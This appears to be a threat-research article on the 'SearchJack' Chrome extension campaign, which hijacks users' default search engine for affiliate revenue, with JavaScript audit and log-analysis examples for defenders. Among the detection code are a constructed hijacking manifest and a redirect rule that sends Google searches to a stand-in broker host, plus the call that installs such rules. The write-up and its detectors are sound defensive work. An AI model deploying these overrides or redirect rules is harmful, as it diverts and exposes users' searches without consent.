The Anatomy of SearchJack: Exploiting Chrome Settings for Large-Scale Affiliate Revenue
A coordinated campaign of 23 seemingly benign Chrome extensions, tracked under the moniker "SearchJack", has replaced the default search configuration of approximately 758,000 users. Rather than delivering the promised utility, these extensions insert themselves between the user and the search engine: every query typed into the omnibox is sent first to the operators' monetization middleware and only then forwarded to a hosted search partner, which returns the results the user eventually sees.
On the surface, these extensions masquerade as helpful productivity tools, offering features such as satellite imagery, news aggregation, or enhanced map interfaces. Their underlying architecture, however, exists for affiliate search monetization. By routing queries through hosted search providers such as Yahoo and through various multi-network affiliate brokers, the operators earn revenue on every search performed by a hijacked browser.
The technical execution of SearchJack is both efficient and stealthy. The extensions rely on the chrome_settings_overrides manifest key, a legitimate mechanism that lets an extension declare a search provider and, with is_default set, make it the browser's default search engine without a single line of script. To minimise scrutiny during automated store review, many of these extensions are "manifest-only" wrappers that declare no background worker, content scripts or permissions at all; others implement a little superficial functionality to provide a veneer of legitimacy.
Through deep packet inspection and URL analysis of the redirect chains, researchers identified at least eight distinct hspart (hosted search partner) values embedded in the final Yahoo URLs. Partner identifiers observed include trp, infospace (System1), flowsurf, adk, becovi, imageadvan, mnet, fc and dcola.
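The override described above can be audited statically, because the whole payload of a manifest-only wrapper is one JSON key. The following is an added example, not code from the SearchJack write-up or from any extension it names: a Node.js audit of an extension manifest that reports whether it sets a default search provider, which host receives the queries, and which hosted-search attribution parameters (hspart, hsimp, type) ride along. The manifest is constructed to mirror the wrapper pattern; the extension name, hostnames and hspart value are placeholders.

```javascript
// Added example, not code from the SearchJack write-up or from any extension
// it names: a static audit of a Chrome extension manifest for a
// search-provider override, runnable under Node.js. The manifest below is
// constructed to mirror the "manifest-only wrapper" pattern; the extension
// name, hostnames and hspart value are placeholders.

const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Example Satellite Maps",   // constructed listing name
  version: "1.0.3",
  description: "Satellite imagery in every new tab",
  // No background worker, no content scripts, no permissions: the single
  // key below is the whole payload.
  chrome_settings_overrides: {
    search_provider: {
      name: "Example Search",
      keyword: "example",
      search_url:
        "https://search.example-broker.test/s?q={searchTerms}&hspart=brokerx&hsimp=yhs-001&type=ext_1",
      favicon_url: "https://search.example-broker.test/favicon.ico",
      encoding: "UTF-8",
      is_default: true,
    },
  },
};

// Query parameters Yahoo hosted search uses to attribute traffic to a partner.
const ATTRIBUTION_PARAMS = ["hspart", "hsimp", "type", "param1", "param2"];

// Summarises what the manifest changes in the browser and who is tagged on
// the resulting search traffic.
function auditManifest(manifest) {
  const result = {
    overridesSearch: false,
    isDefault: false,
    searchHost: null,
    attribution: {},
    manifestOnly: false,
    findings: [],
  };
  const sp = manifest.chrome_settings_overrides?.search_provider;
  if (!sp) return result;

  result.overridesSearch = true;
  result.isDefault = Boolean(sp.is_default);
  // {searchTerms} is a template token, not URL syntax; swap it for a dummy
  // query so the URL parser sees a well-formed query string.
  const url = new URL(sp.search_url.replace("{searchTerms}", "q"));
  result.searchHost = url.hostname;
  for (const p of ATTRIBUTION_PARAMS) {
    const v = url.searchParams.get(p);
    if (v !== null) result.attribution[p] = v;
  }
  // A wrapper with no code at all leaves a reviewer nothing to read but this key.
  const declares = (k) => Array.isArray(manifest[k]) && manifest[k].length > 0;
  result.manifestOnly =
    !manifest.background &&
    !declares("content_scripts") &&
    !declares("permissions") &&
    !declares("host_permissions");

  if (result.isDefault) result.findings.push("sets itself as the default search engine");
  if (result.attribution.hspart)
    result.findings.push(`search traffic tagged hspart=${result.attribution.hspart}`);
  if (result.manifestOnly)
    result.findings.push("manifest-only wrapper: no scripts or permissions declared");
  return result;
}

console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST), null, 2));
```

Run against the unpacked extension directories under a Chrome profile, the same function gives a fleet-wide inventory of which installed extensions own the default search engine and which partner tag each one carries.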
This campaign, analyzed on June 9, 2026, by the MalExt Sentry automated scanner, illustrates a highly scalable, broker-driven model that evades conventional platform policing, exposes users' queries to third parties, and leaves a ready channel for phishing.
Campaign Intelligence Summary
| Field | Value |
|---|---|
| Campaign Name | SearchJack |
| Extensions Identified | 23 |
| Unique Publishers | 22 |
| Total Affected Users | ~758,000 |
| Monetization Brokers | 8 identified via hspart |
| Primary Revenue Vector | Hosted Search Affiliate (Yahoo/Multi-network) |
| Analysis Date | June 09, 2026 |
One of the most resilient aspects of this operation is the decoupling of the publisher from the revenue stream. Because the broker relationships exist independently of any one extension, the operators can rotate "disposable" publisher accounts and republish a fresh wrapper, keeping the income flowing even after specific extensions are removed from the store.
Technical Analysis of Adware Behavior
While the extensions vary in scale, from niche tools to high-traffic installs such as PerfecTab Search and Quick Search Tool (~100K installs each), they share a consistent infrastructure pattern. Several technical anomalies point to intentional deception:
- Deceptive Privacy Claims: Nautilus Search states in its store listing that it does not track user searches, yet its privacy policy contradicts this by disclosing the collection of IP addresses and query logs.
- Runtime Injection: Search Toggler uses the chrome.declarativeNetRequest.updateDynamicRules() API to add redirect rules after installation. Dynamic rules are stored in the extension's profile data rather than shipped in the package, so the malicious routing is absent from the code a store reviewer or static analyser inspects and only appears when the rule set is queried at runtime.
- Review Manipulation: Extensions such as Fusebase Search show implausible install-to-review ratios, suggesting automated review farming or the repurposing of aged, high-reputation accounts.
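The runtime-injection item above is worth seeing in concrete form. The block below is an added example, not the code of Search Toggler or any other SearchJack extension: it shows the shape of a declarativeNetRequest redirect rule that an extension would register with updateDynamicRules() (the call is defined but not executed, since no `chrome` object exists outside an extension), and a checker that, given the rule list returned by a runtime query such as getDynamicRules(), flags rules that turn search-engine navigations into redirects and names the destination host. The rule contents, hostnames and hspart value are constructed placeholders.

```javascript
// Added example, not the code of Search Toggler or any other SearchJack
// extension: the shape of a redirect rule registered at runtime through
// declarativeNetRequest, and a checker that flags such rules. The rule
// contents, hostnames and hspart value are constructed placeholders.

// Nothing like this appears in the reviewed package. After
// updateDynamicRules() runs, the rules live in the extension's profile
// storage and survive restarts, but only a runtime query reveals them.
const CONSTRUCTED_DYNAMIC_RULES = [
  {
    id: 1001,
    priority: 1,
    action: {
      type: "redirect",
      redirect: {
        // \1 is the captured query: a Google search becomes a broker-hosted
        // search carrying the affiliate tag.
        regexSubstitution: "https://go.example-broker.test/r?q=\\1&hspart=brokerx",
      },
    },
    condition: {
      regexFilter: "^https://www\\.google\\.com/search\\?q=([^&]*)",
      resourceTypes: ["main_frame"],
    },
  },
  {
    // A block rule: plausible cover for an advertised "ad blocking" feature.
    id: 1002,
    priority: 1,
    action: { type: "block" },
    condition: { urlFilter: "||ads.example-tracker.test^", resourceTypes: ["script"] },
  },
];

// How an extension installs the rules. chrome.declarativeNetRequest is the
// real API; this function is defined but not called here because no `chrome`
// object exists outside an extension context.
async function installRules(rules) {
  await chrome.declarativeNetRequest.updateDynamicRules({
    removeRuleIds: rules.map((r) => r.id),
    addRules: rules,
  });
}

// Search engines whose top-level navigations an extension has no reason to redirect.
const SEARCH_ENGINE_HOSTS = ["google.com", "bing.com", "duckduckgo.com", "yahoo.com"];

function conditionMentionsSearchEngine(condition) {
  const text = [
    condition.regexFilter,
    condition.urlFilter,
    ...(condition.requestDomains || []),
  ]
    .filter(Boolean)
    .join(" ")
    .replace(/\\\./g, "."); // unescape regex dots for a plain substring check
  return SEARCH_ENGINE_HOSTS.some((h) => text.includes(h));
}

// Hostname a redirect action sends the request to, or null when it cannot be
// determined statically (extensionPath, or a transform that keeps the host).
function redirectDestination(redirect) {
  if (redirect.url) return new URL(redirect.url).hostname;
  if (redirect.regexSubstitution) {
    // Substitute back-references so the template parses as a URL.
    return new URL(redirect.regexSubstitution.replace(/\\\d/g, "x")).hostname;
  }
  if (redirect.transform?.host) return redirect.transform.host;
  return null;
}

// Rules that turn a search-engine page load into a redirect. A rule can only
// touch top-level navigations if resourceTypes names main_frame explicitly.
function findSearchHijackRules(rules) {
  const hits = [];
  for (const rule of rules) {
    if (rule.action?.type !== "redirect") continue;
    const types = rule.condition?.resourceTypes || [];
    if (!types.includes("main_frame")) continue;
    if (!conditionMentionsSearchEngine(rule.condition)) continue;
    hits.push({ id: rule.id, destination: redirectDestination(rule.action.redirect) });
  }
  return hits;
}

console.log(findSearchHijackRules(CONSTRUCTED_DYNAMIC_RULES));
```

The checker deliberately ignores the block rule: a single benign-looking rule is exactly the cover a review process sees, while the redirect rule that matters is only ever present in a live profile.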
The significance of this evolution from simple adware to a systemic security threat is hard to overstate. Because the operators control the middleware, they can switch payloads centrally. A search endpoint that behaves benignly today can, through a server-side change alone, start serving phishing pages, credential harvesters, or drive-by download sites, with no change to the extension's client-side code and therefore nothing new for the store to review.
Attribution and Mitigation Strategies
The technical artifacts found in the SearchJack corpus, specifically the yhs-* parameters in the Yahoo URLs and backend templates such as /admin/public/link, provide a clear roadmap for incident response. Countering the campaign effectively requires a multi-layered approach:
For Platform Operators: Takedowns must move beyond individual extension IDs. Enforcement must target the underlying affiliate accounts and the hosted-search infrastructure that facilitates the revenue flow. Enhanced runtime behavior scanning and stricter publisher verification are essential to close these loopholes.
For Enterprise Security Teams: chrome_settings_overrides is a manifest key, so the first check is an inventory of installed extensions whose manifests declare a search_provider, on endpoints and in the enterprise extension report. Where browsers are managed, locking the default search provider through Chrome's DefaultSearchProviderEnabled and DefaultSearchProviderSearchURL policies prevents an extension override from taking effect in the first place. On the network side, inspect outbound redirect chains for hspart and hsimp parameters that do not belong to a partner the organisation chose, and flag the intermediary search domains that precede the hosted-search endpoint.
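The network-side check above comes down to following Location headers and looking at where a chain ends. The following is an added example, not tooling from the SearchJack report: it parses a handful of constructed proxy log lines (time, client, method, URL, status, Location), reassembles each client's redirect chain, and reports chains that terminate at a Yahoo hosted-search URL carrying an hspart value outside an allowlist. The broker hostnames, client addresses and hspart value are placeholders.

```javascript
// Added example, not from the SearchJack report: reconstruct redirect chains
// from proxy logs and flag the ones that end at a hosted-search endpoint
// carrying a partner tag. Log lines, hostnames and the hspart value are
// constructed placeholders.

// Constructed log lines: time, client IP, method, URL, status, Location (or "-").
const SAMPLE_LOG = `
2026-06-09T10:15:01Z 10.0.0.12 GET https://search.example-broker.test/s?q=vpn+reviews&hspart=brokerx 302 https://go.example-broker.test/r?q=vpn+reviews&hspart=brokerx
2026-06-09T10:15:01Z 10.0.0.12 GET https://go.example-broker.test/r?q=vpn+reviews&hspart=brokerx 302 https://search.yahoo.com/yhs/search?p=vpn+reviews&hspart=brokerx&hsimp=yhs-001&type=ext_1
2026-06-09T10:15:02Z 10.0.0.12 GET https://search.yahoo.com/yhs/search?p=vpn+reviews&hspart=brokerx&hsimp=yhs-001&type=ext_1 200 -
2026-06-09T10:16:40Z 10.0.0.33 GET https://duckduckgo.com/?q=weather 200 -
2026-06-09T10:17:05Z 10.0.0.33 GET https://intranet.corp.test/login 302 https://sso.corp.test/auth
2026-06-09T10:17:05Z 10.0.0.33 GET https://sso.corp.test/auth 200 -
`.trim();

function parseLog(text) {
  return text.split("\n").map((line) => {
    const [time, client, method, url, status, location] = line.trim().split(/\s+/);
    return { time, client, method, url, status: Number(status), location: location === "-" ? null : location };
  });
}

// Follow Location headers: a 3xx whose Location is the next URL the same
// client fetched starts or extends a chain. Unmatched records stand alone.
function reconstructChains(records) {
  const chains = [];
  const consumed = new Set();
  for (let i = 0; i < records.length; i++) {
    if (consumed.has(i)) continue;
    consumed.add(i);
    let current = records[i];
    const urls = [current.url];
    while (current.status >= 300 && current.status < 400 && current.location) {
      const next = records.findIndex(
        (r, j) => !consumed.has(j) && r.client === current.client && r.url === current.location,
      );
      if (next === -1) break;
      consumed.add(next);
      current = records[next];
      urls.push(current.url);
    }
    chains.push({ client: records[i].client, urls });
  }
  return chains;
}

// Partners the organisation configured on purpose (none, in this example).
const ALLOWED_HSPART = new Set();

function isYahooHostedSearch(url) {
  const host = url.hostname;
  return (host === "search.yahoo.com" || host.endsWith(".search.yahoo.com")) && url.pathname.startsWith("/yhs/");
}

// Chains whose final hop is a Yahoo hosted-search page tagged with an
// unapproved partner. A direct request with no redirect is a one-hop chain
// and is judged the same way.
function flagHostedSearchChains(chains) {
  const hits = [];
  for (const { client, urls } of chains) {
    const last = new URL(urls[urls.length - 1]);
    const hspart = last.searchParams.get("hspart");
    if (!isYahooHostedSearch(last) || !hspart || ALLOWED_HSPART.has(hspart)) continue;
    hits.push({
      client,
      hspart,
      hsimp: last.searchParams.get("hsimp"),
      hops: urls.map((u) => new URL(u).hostname),
    });
  }
  return hits;
}

function analyseLog(text) {
  return flagHostedSearchChains(reconstructChains(parseLog(text)));
}

console.log(analyseLog(SAMPLE_LOG));
```

Every intermediate hostname in a flagged chain is a candidate for the blocklist of intermediary search endpoints, and grouping hits by hspart gives the broker-level view that takedowns of individual extension IDs do not.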
For End Users: If your search engine changes unexpectedly, audit your installed extensions immediately. Remove any suspicious or unneeded tools, then reset the browser's default search engine to a provider you trust; a hijacked extension will simply set it back again until it is removed.
Until broker-level controls are tightened, SearchJack-style campaigns will continue to serve as a profitable and resilient vector for large-scale privacy invasion and social engineering attacks.